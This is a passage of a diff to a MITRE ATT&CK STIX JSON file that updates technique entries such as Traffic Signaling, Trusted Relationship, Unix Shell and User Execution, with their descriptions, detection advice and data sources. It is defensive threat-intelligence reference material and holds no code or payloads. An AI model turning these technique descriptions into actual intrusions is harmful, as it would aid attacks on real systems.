- "description": "Adversaries may duplicate then impersonate another user's token to escalate privileges and bypass access controls. An adversary can create a new access token that duplicates an existing token using DuplicateToken(Ex). The token can then be used with ImpersonateLoggedOnUser to allow the calling thread to impersonate a logged on user's security context, or with SetThreadToken to assign the impersonated token to a thread.\n\nAn adversary may do this when they have a specific, existing process they want to assign the new token to. For example, this may be useful for when the target user has a non-network logon session on the system.",
- "id": "attack-pattern--86850eff-2729-40c3-b85e-c4af26da4a2d",
- "type": "attack-pattern",
- "kill_chain_phases": [
- {
- "kill_chain_name": "mitre-attack",
- "phase_name": "defense-evasion"
- },
- {
- "kill_chain_name": "mitre-attack",
- "phase_name": "privilege-escalation"
- }
- ],
- "modified": "2020-03-26T21:29:18.608Z",
- "created": "2020-02-18T16:39:06.289Z",
"x_mitre_platforms": [
"Windows"
],
@@ -27373,11 +28281,16 @@
"x_mitre_version": "1.0"
},
{
+ "revoked": false,
+ "id": "attack-pattern--451a9977-d255-43c9-b431-66de80130c8c",
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "name": "Traffic Signaling",
+ "description": "Adversaries may use traffic signaling to hide open ports or other malicious functionality used for persistence or command and control. Traffic signaling involves the use of a magic value or sequence that must be sent to a system to trigger a special response, such as opening a closed port or executing a malicious task. This may take the form of sending a series of packets with certain characteristics before a port will be opened that the adversary can use for command and control. Usually this series of packets consists of attempted connections to a predefined sequence of closed ports (i.e. [Port Knocking](https://attack.mitre.org/techniques/T1205/001)), but can involve unusual flags, specific strings, or other unique characteristics. After the sequence is completed, opening a port may be accomplished by the host-based firewall, but could also be implemented by custom software.\n\nAdversaries may also communicate with an already open port, but the service listening on that port will only respond to commands or trigger other malicious functionality if passed the appropriate magic value(s).\n\nThe observation of the signal packets to trigger the communication can be conducted through different methods. One means, originally implemented by Cd00r (Citation: Hartrell cd00r 2002), is to use the libpcap libraries to sniff for the packets in question. Another method leverages raw sockets, which enables the malware to use ports that are already open for use by other programs.",
"external_references": [
{
"source_name": "mitre-attack",
- "external_id": "T1545",
- "url": "https://attack.mitre.org/techniques/T1545"
+ "external_id": "T1205",
+ "url": "https://attack.mitre.org/techniques/T1205"
},
{
"url": "https://www.giac.org/paper/gcih/342/handle-cd00r-invisible-backdoor/103631",
@@ -27388,10 +28301,6 @@
"object_marking_refs": [
"marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
],
- "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
- "name": "Traffic Signaling",
- "description": "Adversaries may use traffic signaling to hide open ports used for persistence or command and control. Traffic signaling is a well-established method used by both defenders and adversaries to hide open ports from access/discovery. To enable a port, an adversary sends a series of packets with certain characteristics before the port will be opened. Usually this series of packets consists of attempted connections to a predefined sequence of closed ports (i.e. [Port Knocking](https://attack.mitre.org/techniques/T1545/001)), but can involve unusual flags, specific strings, or other unique characteristics. After the sequence is completed, opening a port is often accomplished by the host based firewall, but could also be implemented by custom software.\n\nThis technique has been observed for both the dynamic opening of a listening port as well as the initiating of a connection to a listening server on a different system.\n\nThe observation of the signal packets to trigger the communication can be conducted through different methods. One means, originally implemented by Cd00r (Citation: Hartrell cd00r 2002), is to use the libpcap libraries to sniff for the packets in question. Another method leverages raw sockets, which enables the malware to use ports that are already open for use by other programs.",
- "id": "attack-pattern--c2dc4e98-ce10-4af8-866f-2187e84466f4",
"type": "attack-pattern",
"kill_chain_phases": [
{
@@ -27407,28 +28316,30 @@
"phase_name": "command-and-control"
}
],
- "modified": "2020-03-27T20:14:07.431Z",
- "created": "2020-01-22T20:18:16.952Z",
- "x_mitre_platforms": [
- "Linux",
- "macOS"
+ "modified": "2020-07-01T18:27:41.755Z",
+ "created": "2018-04-18T17:59:24.739Z",
+ "x_mitre_contributors": [
+ "Josh Day, Gigamon"
],
"x_mitre_data_sources": [
- "Netflow/Enclave netflow",
- "Packet capture"
- ],
- "x_mitre_detection": "Record network packets sent to and from the system, looking for extraneous packets that do not belong to established flows.",
- "x_mitre_defense_bypassed": [
- "Defensive network service scanning"
+ "Packet capture",
+ "Netflow/Enclave netflow"
],
"x_mitre_permissions_required": [
"User"
],
- "x_mitre_is_subtechnique": false,
- "x_mitre_version": "1.0",
- "x_mitre_contributors": [
- "Josh Day, Gigamon"
- ]
+ "x_mitre_platforms": [
+ "Linux",
+ "macOS",
+ "Windows"
+ ],
+ "x_mitre_network_requirements": true,
+ "x_mitre_detection": "Record network packets sent to and from the system, looking for extraneous packets that do not belong to established flows.",
+ "x_mitre_defense_bypassed": [
+ "Defensive network service scanning"
+ ],
+ "x_mitre_version": "2.0",
+ "x_mitre_is_subtechnique": false
},
{
"external_references": [
@@ -27459,26 +28370,26 @@
],
"modified": "2020-03-29T23:43:44.256Z",
"created": "2019-08-30T13:03:04.038Z",
- "x_mitre_platforms": [
- "Azure",
- "AWS",
- "GCP"
- ],
- "x_mitre_contributors": [
- "Praetorian"
- ],
- "x_mitre_network_requirements": true,
- "x_mitre_permissions_required": [
- "User"
- ],
- "x_mitre_version": "1.0",
+ "x_mitre_is_subtechnique": false,
+ "x_mitre_detection": "Monitor account activity for attempts to share data, snapshots, or backups with untrusted or unusual accounts on the same cloud service provider. Monitor for anomalous file transfer activity between accounts and to untrusted VPCs. ",
"x_mitre_data_sources": [
"Stackdriver logs",
"Azure activity logs",
"AWS CloudTrail logs"
],
- "x_mitre_detection": "Monitor account activity for attempts to share data, snapshots, or backups with untrusted or unusual accounts on the same cloud service provider. Monitor for anomalous file transfer activity between accounts and to untrusted VPCs. ",
- "x_mitre_is_subtechnique": false
+ "x_mitre_version": "1.0",
+ "x_mitre_permissions_required": [
+ "User"
+ ],
+ "x_mitre_network_requirements": true,
+ "x_mitre_contributors": [
+ "Praetorian"
+ ],
+ "x_mitre_platforms": [
+ "Azure",
+ "AWS",
+ "GCP"
+ ]
},
{
"id": "attack-pattern--cc1e737c-236c-4e3b-83ba-32039a626ef8",
@@ -27539,27 +28450,27 @@
],
"modified": "2020-03-02T15:20:28.455Z",
"created": "2020-03-02T14:27:00.693Z",
- "x_mitre_platforms": [
- "Linux",
- "macOS",
- "Windows"
- ],
- "x_mitre_data_sources": [
- "Packet capture",
- "Network protocol analysis"
- ],
- "x_mitre_detection": "Detecting the manipulation of data as at passes over a network can be difficult without the appropriate tools. In some cases integrity verification checks, such as file hashing, may be used on critical files as they transit a network. With some critical processes involving transmission of data, manual or out-of-band integrity checking may be useful for identifying manipulated data. ",
- "x_mitre_impact_type": [
- "Integrity"
- ],
+ "x_mitre_version": "1.0",
+ "x_mitre_is_subtechnique": true,
"x_mitre_permissions_required": [
"User",
"Administrator",
"SYSTEM",
"root"
],
- "x_mitre_is_subtechnique": true,
- "x_mitre_version": "1.0"
+ "x_mitre_impact_type": [
+ "Integrity"
+ ],
+ "x_mitre_detection": "Detecting the manipulation of data as at passes over a network can be difficult without the appropriate tools. In some cases integrity verification checks, such as file hashing, may be used on critical files as they transit a network. With some critical processes involving transmission of data, manual or out-of-band integrity checking may be useful for identifying manipulated data. ",
+ "x_mitre_data_sources": [
+ "Packet capture",
+ "Network protocol analysis"
+ ],
+ "x_mitre_platforms": [
+ "Linux",
+ "macOS",
+ "Windows"
+ ]
},
{
"external_references": [
@@ -27595,26 +28506,26 @@
],
"modified": "2020-03-25T22:59:59.124Z",
"created": "2019-12-12T15:08:20.972Z",
- "x_mitre_platforms": [
- "Linux",
- "Windows"
- ],
- "x_mitre_contributors": [
- "ESET",
- " Christoffer Str\u00f6mblad"
+ "x_mitre_detection": "Consider monitoring application logs for abnormal behavior that may indicate suspicious installation of application software components. Consider monitoring file locations associated with the installation of new application software components such as paths from which applications typically load such extensible components.",
+ "x_mitre_data_sources": [
+ "Application logs",
+ "File monitoring"
],
+ "x_mitre_version": "1.0",
+ "x_mitre_is_subtechnique": true,
"x_mitre_permissions_required": [
"SYSTEM",
"Administrator",
"root"
],
- "x_mitre_is_subtechnique": true,
- "x_mitre_version": "1.0",
- "x_mitre_data_sources": [
- "Application logs",
- "File monitoring"
+ "x_mitre_contributors": [
+ "ESET",
+ " Christoffer Str\u00f6mblad"
],
- "x_mitre_detection": "Consider monitoring application logs for abnormal behavior that may indicate suspicious installation of application software components. Consider monitoring file locations associated with the installation of new application software components such as paths from which applications typically load such extensible components."
+ "x_mitre_platforms": [
+ "Linux",
+ "Windows"
+ ]
},
{
"id": "attack-pattern--b53dbcc6-147d-48bb-9df4-bcb8bb808ff6",
@@ -27679,22 +28590,22 @@
],
"modified": "2020-03-24T16:43:02.273Z",
"created": "2020-01-24T14:17:43.906Z",
- "x_mitre_platforms": [
- "macOS",
- "Linux"
+ "x_mitre_version": "1.0",
+ "x_mitre_is_subtechnique": true,
+ "x_mitre_permissions_required": [
+ "User",
+ "Administrator"
],
+ "x_mitre_detection": "Trap commands must be registered for the shell or programs, so they appear in files. Monitoring files for suspicious or overly broad trap commands can narrow down suspicious behavior during an investigation. Monitor for suspicious processes executed through trap interrupts.",
"x_mitre_data_sources": [
"Process command-line parameters",
"Process monitoring",
"File monitoring"
],
- "x_mitre_detection": "Trap commands must be registered for the shell or programs, so they appear in files. Monitoring files for suspicious or overly broad trap commands can narrow down suspicious behavior during an investigation. Monitor for suspicious processes executed through trap interrupts.",
- "x_mitre_permissions_required": [
- "User",
- "Administrator"
- ],
- "x_mitre_is_subtechnique": true,
- "x_mitre_version": "1.0"
+ "x_mitre_platforms": [
+ "macOS",
+ "Linux"
+ ]
},
{
"object_marking_refs": [
@@ -27727,7 +28638,7 @@
"description": "LOLBAS. (n.d.). Tracker.exe. Retrieved July 31, 2019."
}
],
- "description": "Adversaries may take advantage of trusted developer utilities to proxy execution of malicious payloads. There are many utilities used for software development related tasks that can be used to execute code in various forms to assist in development, debugging, and reverse engineering.(Citation: engima0x3 DNX Bypass)(Citation: engima0x3 RCSI Bypass)(Citation: Exploit Monday WinDbg)(Citation: LOLBAS Tracker) These utilities may often be signed with legitimate certificates that allow them to execute on a system and proxy execution of malicious code through a trusted process that effectively bypasses application whitelisting defensive solutions.",
+ "description": "Adversaries may take advantage of trusted developer utilities to proxy execution of malicious payloads. There are many utilities used for software development related tasks that can be used to execute code in various forms to assist in development, debugging, and reverse engineering.(Citation: engima0x3 DNX Bypass)(Citation: engima0x3 RCSI Bypass)(Citation: Exploit Monday WinDbg)(Citation: LOLBAS Tracker) These utilities may often be signed with legitimate certificates that allow them to execute on a system and proxy execution of malicious code through a trusted process that effectively bypasses application control solutions.",
"name": "Trusted Developer Utilities Proxy Execution",
"created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
"id": "attack-pattern--ff25900d-76d5-449b-a351-8824e62fc81b",
@@ -27738,33 +28649,34 @@
"kill_chain_name": "mitre-attack"
}
],
- "modified": "2020-03-29T19:56:43.361Z",
+ "modified": "2020-06-20T22:43:41.298Z",
"created": "2017-05-31T21:31:39.262Z",
- "x_mitre_is_subtechnique": false,
- "x_mitre_platforms": [
- "Windows"
- ],
- "x_mitre_permissions_required": [
- "User"
- ],
- "x_mitre_detection": "Monitor for abnormal presence of these or other utilities that enable proxy execution that are typically used for development, debugging, and reverse engineering on a system that is not used for these purposes may be suspicious.\n\nUse process monitoring to monitor the execution and arguments of from developer utilities that may be abused. Compare recent invocations of those binaries with prior history of known good arguments and executed binaries to determine anomalous and potentially adversarial activity. It is likely that these utilities will be used by software developers or for other software development related tasks, so if it exists and is used outside of that context, then the event may be suspicious. Command arguments used before and after invocation of the utilities may also be useful in determining the origin and purpose of the binary being executed.",
- "x_mitre_defense_bypassed": [
- "Application whitelisting"
+ "x_mitre_version": "1.2",
+ "x_mitre_contributors": [
+ "Casey Smith",
+ "Matthew Demaske, Adaptforward"
],
"x_mitre_data_sources": [
"File monitoring",
"Process monitoring"
],
- "x_mitre_contributors": [
- "Casey Smith",
- "Matthew Demaske, Adaptforward"
+ "x_mitre_defense_bypassed": [
+ "Application control"
],
- "x_mitre_version": "1.2"
+ "x_mitre_detection": "Monitor for abnormal presence of these or other utilities that enable proxy execution that are typically used for development, debugging, and reverse engineering on a system that is not used for these purposes may be suspicious.\n\nUse process monitoring to monitor the execution and arguments of from developer utilities that may be abused. Compare recent invocations of those binaries with prior history of known good arguments and executed binaries to determine anomalous and potentially adversarial activity. It is likely that these utilities will be used by software developers or for other software development related tasks, so if it exists and is used outside of that context, then the event may be suspicious. Command arguments used before and after invocation of the utilities may also be useful in determining the origin and purpose of the binary being executed.",
+ "x_mitre_permissions_required": [
+ "User"
+ ],
+ "x_mitre_platforms": [
+ "Windows"
+ ],
+ "x_mitre_is_subtechnique": false
},
{
- "object_marking_refs": [
- "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
- ],
+ "id": "attack-pattern--9fa07bef-9c81-421e-a8e5-ad4366c5a925",
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "name": "Trusted Relationship",
+ "description": "Adversaries may breach or otherwise leverage organizations who have access to intended victims. Access through trusted third party relationship exploits an existing connection that may not be protected or receives less scrutiny than standard mechanisms of gaining access to a network.\n\nOrganizations often grant elevated access to second or third-party external providers in order to allow them to manage internal systems as well as cloud-based environments. Some examples of these relationships include IT services contractors, managed security providers, infrastructure contractors (e.g. HVAC, elevators, physical security). The third-party provider's access may be intended to be limited to the infrastructure being maintained, but may exist on the same network as the rest of the enterprise. As such, [Valid Accounts](https://attack.mitre.org/techniques/T1078) used by the other party for access to internal network systems may be compromised and used.",
"external_references": [
{
"source_name": "mitre-attack",
@@ -27772,10 +28684,9 @@
"external_id": "T1199"
}
],
- "description": "Adversaries may breach or otherwise leverage organizations who have access to intended victims. Access through trusted third party relationship exploits an existing connection that may not be protected or receives less scrutiny than standard mechanisms of gaining access to a network.\n\nOrganizations often grant elevated access to second or third-party external providers in order to allow them to manage internal systems as well as cloud-based environments. Some examples of these relationships include IT services contractors, managed security providers, infrastructure contractors (e.g. HVAC, elevators, physical security). The third-party provider's access may be intended to be limited to the infrastructure being maintained, but may exist on the same network as the rest of the enterprise. As such, [Valid Accounts](https://attack.mitre.org/techniques/T1078) used by the other party for access to internal network systems may be compromised and used.",
- "name": "Trusted Relationship",
- "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
- "id": "attack-pattern--9fa07bef-9c81-421e-a8e5-ad4366c5a925",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
"type": "attack-pattern",
"kill_chain_phases": [
{
@@ -27783,8 +28694,9 @@
"phase_name": "initial-access"
}
],
- "modified": "2019-10-11T15:20:53.687Z",
+ "modified": "2020-07-14T19:38:14.299Z",
"created": "2018-04-18T17:59:24.739Z",
+ "x_mitre_is_subtechnique": false,
"x_mitre_platforms": [
"Linux",
"Windows",
@@ -27809,10 +28721,18 @@
]
},
{
- "id": "attack-pattern--dd43c543-bb85-4a6f-aa6e-160d90d06a49",
- "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
- "name": "Two-Factor Authentication Interception",
- "description": "Adversaries may target two-factor authentication mechanisms, such as smart cards, to gain access to credentials that can be used to access systems, services, and network resources. Use of two or multi-factor authentication (2FA or MFA) is recommended and provides a higher level of security than user names and passwords alone, but organizations should be aware of techniques that could be used to intercept and bypass these security mechanisms. \n\nIf a smart card is used for two-factor authentication, then a keylogger will need to be used to obtain the password associated with a smart card during normal use. With both an inserted card and access to the smart card password, an adversary can connect to a network resource using the infected system to proxy the authentication with the inserted hardware token. (Citation: Mandiant M Trends 2011)\n\nAdversaries may also employ a keylogger to similarly target other hardware tokens, such as RSA SecurID. Capturing token input (including a user's personal identification code) may provide temporary access (i.e. replay the one-time passcode until the next value rollover) as well as possibly enabling adversaries to reliably predict future authentication values (given access to both the algorithm and any seed values used to generate appended temporary codes). (Citation: GCN RSA June 2011)\n\nOther methods of 2FA may be intercepted and used by an adversary to authenticate. It is common for one-time codes to be sent via out-of-band communications (email, SMS). If the device and/or service is not secured, then it may be vulnerable to interception. Although primarily focused on by cyber criminals, these authentication mechanisms have been targeted by advanced actors. (Citation: Operation Emmental)",
+ "created": "2017-05-31T21:31:23.195Z",
+ "modified": "2020-03-25T20:35:21.672Z",
+ "kill_chain_phases": [
+ {
+ "kill_chain_name": "mitre-attack",
+ "phase_name": "credential-access"
+ }
+ ],
+ "type": "attack-pattern",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
"external_references": [
{
"source_name": "mitre-attack",
@@ -27835,18 +28755,10 @@
"source_name": "Operation Emmental"
}
],
- "object_marking_refs": [
- "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
- ],
- "type": "attack-pattern",
- "kill_chain_phases": [
- {
- "kill_chain_name": "mitre-attack",
- "phase_name": "credential-access"
- }
- ],
- "modified": "2020-03-25T20:35:21.672Z",
- "created": "2017-05-31T21:31:23.195Z",
+ "description": "Adversaries may target two-factor authentication mechanisms, such as smart cards, to gain access to credentials that can be used to access systems, services, and network resources. Use of two or multi-factor authentication (2FA or MFA) is recommended and provides a higher level of security than user names and passwords alone, but organizations should be aware of techniques that could be used to intercept and bypass these security mechanisms. \n\nIf a smart card is used for two-factor authentication, then a keylogger will need to be used to obtain the password associated with a smart card during normal use. With both an inserted card and access to the smart card password, an adversary can connect to a network resource using the infected system to proxy the authentication with the inserted hardware token. (Citation: Mandiant M Trends 2011)\n\nAdversaries may also employ a keylogger to similarly target other hardware tokens, such as RSA SecurID. Capturing token input (including a user's personal identification code) may provide temporary access (i.e. replay the one-time passcode until the next value rollover) as well as possibly enabling adversaries to reliably predict future authentication values (given access to both the algorithm and any seed values used to generate appended temporary codes). (Citation: GCN RSA June 2011)\n\nOther methods of 2FA may be intercepted and used by an adversary to authenticate. It is common for one-time codes to be sent via out-of-band communications (email, SMS). If the device and/or service is not secured, then it may be vulnerable to interception. Although primarily focused on by cyber criminals, these authentication mechanisms have been targeted by advanced actors. (Citation: Operation Emmental)",
+ "name": "Two-Factor Authentication Interception",
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "id": "attack-pattern--dd43c543-bb85-4a6f-aa6e-160d90d06a49",
"x_mitre_version": "1.1",
"x_mitre_contributors": [
"John Lambert, Microsoft Threat Intelligence Center"
@@ -27892,6 +28804,64 @@
"created": "2017-05-31T21:30:53.408Z"
},
{
+ "id": "attack-pattern--a9d4b653-6915-42af-98b2-5758c4ceee56",
+ "description": "Adversaries may abuse Unix shell commands and scripts for execution. Unix shells are the primary command prompt on Linux and macOS systems, though many variations of the Unix shell exist (e.g. sh, bash, zsh, etc.) depending on the specific OS or distribution.(Citation: DieNet Bash)(Citation: Apple ZShell) Unix shells can control every aspect of a system, with certain commands requiring elevated privileges.\n\nUnix shells also support scripts that enable sequential execution of commands as well as other typical programming operations such as conditionals and loops. Common uses of shell scripts include long or repetitive tasks, or the need to run the same set of commands on multiple systems.\n\nAdversaries may abuse Unix shells to execute various commands or payloads. Interactive shells may be accessed through command and control channels or during lateral movement such as with [SSH](https://attack.mitre.org/techniques/T1021/004). Adversaries may also leverage shell scripts to deliver and execute multiple commands on victims or as part of payloads used for persistence.",
+ "name": "Unix Shell",
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "external_references": [
+ {
+ "source_name": "mitre-attack",
+ "external_id": "T1059.004",
+ "url": "https://attack.mitre.org/techniques/T1059/004"
+ },
+ {
+ "source_name": "DieNet Bash",
+ "url": "https://linux.die.net/man/1/bash",
+ "description": "die.net. (n.d.). bash(1) - Linux man page. Retrieved June 12, 2020."
+ },
+ {
+ "source_name": "Apple ZShell",
+ "url": "https://support.apple.com/HT208050",
+ "description": "Apple. (2020, January 28). Use zsh as the default shell on your Mac. Retrieved June 12, 2020."
+ }
+ ],
+ "type": "attack-pattern",
+ "kill_chain_phases": [
+ {
+ "kill_chain_name": "mitre-attack",
+ "phase_name": "execution"
+ }
+ ],
+ "modified": "2020-06-15T16:55:44.483Z",
+ "created": "2020-03-09T14:15:05.330Z",
+ "x_mitre_platforms": [
+ "macOS",
+ "Linux"
+ ],
+ "x_mitre_data_sources": [
+ "File monitoring",
+ "Process monitoring",
+ "Process command-line parameters"
+ ],
+ "x_mitre_detection": "Unix shell usage may be common on administrator, developer, or power user systems, depending on job function. If scripting is restricted for normal users, then any attempt to enable scripts running on a system would be considered suspicious. If scripts are not commonly used on a system, but enabled, scripts running out of cycle from patching or other administrator functions are suspicious. Scripts should be captured from the file system when possible to determine their actions and intent.\n\nScripts are likely to perform actions with various effects on a system that may generate events, depending on the types of monitoring used. Monitor processes and command-line arguments for script execution and subsequent behavior. Actions may be related to network and system information discovery, collection, or other scriptable post-compromise behaviors and could be used as indicators of detection leading back to the source script. ",
+ "x_mitre_permissions_required": [
+ "User",
+ "root"
+ ],
+ "x_mitre_is_subtechnique": true,
+ "x_mitre_version": "1.0"
+ },
+ {
+ "id": "attack-pattern--435dfb86-2697-4867-85b5-2fef496c0517",
+ "description": "Adversaries may search compromised systems to find and obtain insecurely stored credentials. These credentials can be stored and/or misplaced in many locations on a system, including plaintext files (e.g. [Bash History](https://attack.mitre.org/techniques/T1552/003)), operating system or application-specific repositories (e.g. [Credentials in Registry](https://attack.mitre.org/techniques/T1552/002)), or other specialized files/artifacts (e.g. [Private Keys](https://attack.mitre.org/techniques/T1552/004)).",
+ "name": "Unsecured Credentials",
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
"external_references": [
{
"source_name": "mitre-attack",
@@ -27899,13 +28869,6 @@
"url": "https://attack.mitre.org/techniques/T1552"
}
],
- "object_marking_refs": [
- "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
- ],
- "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
- "name": "Unsecured Credentials",
- "description": "Adversaries may search compromised systems to find and obtain insecurely stored credentials. These credentials can be stored and/or misplaced in many locations on a system, including plaintext files (e.g. [Bash History](https://attack.mitre.org/techniques/T1552/003)), operating system or application-specific repositories (e.g. [Credentials in Registry](https://attack.mitre.org/techniques/T1552/002)), or other specialized files/artifacts (e.g. [Private Keys](https://attack.mitre.org/techniques/T1552/004)).",
- "id": "attack-pattern--435dfb86-2697-4867-85b5-2fef496c0517",
"type": "attack-pattern",
"kill_chain_phases": [
{
@@ -27913,7 +28876,7 @@
"phase_name": "credential-access"
}
],
- "modified": "2020-03-31T12:53:56.541Z",
+ "modified": "2020-06-17T14:25:38.461Z",
"created": "2020-02-04T12:47:23.631Z",
"x_mitre_platforms": [
"Linux",
@@ -27973,26 +28936,27 @@
"phase_name": "defense-evasion"
}
],
- "modified": "2019-10-22T19:56:22.024Z",
+ "modified": "2020-07-14T19:17:44.563Z",
"created": "2019-09-04T14:35:04.617Z",
- "x_mitre_detection": "Monitor system logs to review activities occurring across all cloud environments and regions. Configure alerting to notify of activity in normally unused regions or if the number of instances active in a region goes above a certain threshold.(Citation: CloudSploit - Unused AWS Regions)",
- "x_mitre_permissions_required": [
- "User"
+ "x_mitre_is_subtechnique": false,
+ "x_mitre_platforms": [
+ "AWS",
+ "GCP",
+ "Azure"
],
+ "x_mitre_contributors": [
+ "Netskope"
+ ],
+ "x_mitre_version": "1.0",
"x_mitre_data_sources": [
"Stackdriver logs",
"Azure activity logs",
"AWS CloudTrail logs"
],
- "x_mitre_version": "1.0",
- "x_mitre_contributors": [
- "Netskope"
+ "x_mitre_permissions_required": [
+ "User"
],
- "x_mitre_platforms": [
- "AWS",
- "GCP",
- "Azure"
- ]
+ "x_mitre_detection": "Monitor system logs to review activities occurring across all cloud environments and regions. Configure alerting to notify of activity in normally unused regions or if the number of instances active in a region goes above a certain threshold.(Citation: CloudSploit - Unused AWS Regions)"
},
{
"external_references": [
@@ -28037,22 +29001,22 @@
],
"modified": "2020-03-24T12:36:24.608Z",
"created": "2020-01-30T16:18:36.873Z",
- "x_mitre_platforms": [
- "Windows",
- "Office 365",
- "SaaS"
+ "x_mitre_version": "1.0",
+ "x_mitre_is_subtechnique": false,
+ "x_mitre_defense_bypassed": [
+ "System Access Controls"
],
+ "x_mitre_detection": "Configure robust, consistent account activity audit policies across the enterprise and with externally accessible services.(Citation: TechNet Audit Policy) Look for suspicious account behavior across systems that share accounts, either user, admin, or service accounts. Examples: one account logged into multiple systems simultaneously; multiple accounts logged into the same machine simultaneously; accounts logged in at odd times or outside of business hours. Activity may be from interactive login sessions or process ownership from accounts being used to execute binaries on a remote system as a particular account. Correlate other security systems with login information (e.g., a user has an active login session but has not entered the building or does not have VPN access).",
"x_mitre_data_sources": [
"Office 365 audit logs",
"OAuth audit logs",
"Authentication logs"
],
- "x_mitre_detection": "Configure robust, consistent account activity audit policies across the enterprise and with externally accessible services.(Citation: TechNet Audit Policy) Look for suspicious account behavior across systems that share accounts, either user, admin, or service accounts. Examples: one account logged into multiple systems simultaneously; multiple accounts logged into the same machine simultaneously; accounts logged in at odd times or outside of business hours. Activity may be from interactive login sessions or process ownership from accounts being used to execute binaries on a remote system as a particular account. Correlate other security systems with login information (e.g., a user has an active login session but has not entered the building or does not have VPN access).",
- "x_mitre_defense_bypassed": [
- "System Access Controls"
- ],
- "x_mitre_is_subtechnique": false,
- "x_mitre_version": "1.0"
+ "x_mitre_platforms": [
+ "Windows",
+ "Office 365",
+ "SaaS"
+ ]
},
{
"external_references": [
@@ -28089,37 +29053,49 @@
{
"kill_chain_name": "mitre-attack",
"phase_name": "defense-evasion"
+ },
+ {
+ "kill_chain_name": "mitre-attack",
+ "phase_name": "discovery"
}
],
- "modified": "2020-03-27T14:10:32.872Z",
+ "modified": "2020-07-01T16:32:02.491Z",
"created": "2020-03-06T21:04:12.454Z",
- "x_mitre_platforms": [
- "Linux",
- "macOS",
- "Windows"
- ],
- "x_mitre_contributors": [
- "Deloitte Threat Library Team"
- ],
- "x_mitre_data_sources": [
- "Process command-line parameters",
- "Process use of network"
- ],
- "x_mitre_detection": "User activity-based checks will likely occur in the first steps of an operation but may also occur throughout as an adversary learns the environment. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as lateral movement, based on the information obtained. Detecting actions related to virtualization and sandbox identification may be difficult depending on the adversary's implementation and monitoring required. Monitoring for suspicious processes being spawned that gather a variety of system information or perform other forms of Discovery, especially in a short period of time, may aid in detection. ",
- "x_mitre_is_subtechnique": true,
- "x_mitre_version": "1.0",
"x_mitre_defense_bypassed": [
"Anti-virus",
"Static File Analysis",
"Signature-based detection",
"Host forensic analysis"
+ ],
+ "x_mitre_version": "1.0",
+ "x_mitre_is_subtechnique": true,
+ "x_mitre_detection": "User activity-based checks will likely occur in the first steps of an operation but may also occur throughout as an adversary learns the environment. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as lateral movement, based on the information obtained. Detecting actions related to virtualization and sandbox identification may be difficult depending on the adversary's implementation and monitoring required. Monitoring for suspicious processes being spawned that gather a variety of system information or perform other forms of Discovery, especially in a short period of time, may aid in detection. ",
+ "x_mitre_data_sources": [
+ "Process command-line parameters",
+ "Process use of network"
+ ],
+ "x_mitre_contributors": [
+ "Deloitte Threat Library Team"
+ ],
+ "x_mitre_platforms": [
+ "Linux",
+ "macOS",
+ "Windows"
]
},
{
- "id": "attack-pattern--8c32eb4d-805f-4fc5-bf60-c4d476c131b5",
- "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
- "name": "User Execution",
- "description": "An adversary may rely upon specific actions by a user in order to gain execution. Users may be subjected to social engineering to get them to execute malicious code by, for example, opening a malicious document file or link. These user actions will typically be observed as follow-on behavior from forms of [Phishing](https://attack.mitre.org/techniques/T1566).\n\nWhile [User Execution](https://attack.mitre.org/techniques/T1204) frequently occurs shortly after Initial Access it may occur at other phases of an intrusion, such as when an adversary places a file in a shared directory or on a user's desktop hoping that a user will click on it. This activity may also be seen shortly after [Internal Spearphishing](https://attack.mitre.org/techniques/T1534).",
+ "created": "2018-04-18T17:59:24.739Z",
+ "modified": "2020-03-11T14:55:56.315Z",
+ "kill_chain_phases": [
+ {
+ "kill_chain_name": "mitre-attack",
+ "phase_name": "execution"
+ }
+ ],
+ "type": "attack-pattern",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
"external_references": [
{
"source_name": "mitre-attack",
@@ -28127,18 +29103,10 @@
"url": "https://attack.mitre.org/techniques/T1204"
}
],
- "object_marking_refs": [
- "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
- ],
- "type": "attack-pattern",
- "kill_chain_phases": [
- {
- "kill_chain_name": "mitre-attack",
- "phase_name": "execution"
- }
- ],
- "modified": "2020-03-11T14:55:56.315Z",
- "created": "2018-04-18T17:59:24.739Z",
+ "description": "An adversary may rely upon specific actions by a user in order to gain execution. Users may be subjected to social engineering to get them to execute malicious code by, for example, opening a malicious document file or link. These user actions will typically be observed as follow-on behavior from forms of [Phishing](https://attack.mitre.org/techniques/T1566).\n\nWhile [User Execution](https://attack.mitre.org/techniques/T1204) frequently occurs shortly after Initial Access it may occur at other phases of an intrusion, such as when an adversary places a file in a shared directory or on a user's desktop hoping that a user will click on it. This activity may also be seen shortly after [Internal Spearphishing](https://attack.mitre.org/techniques/T1534).",
+ "name": "User Execution",
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
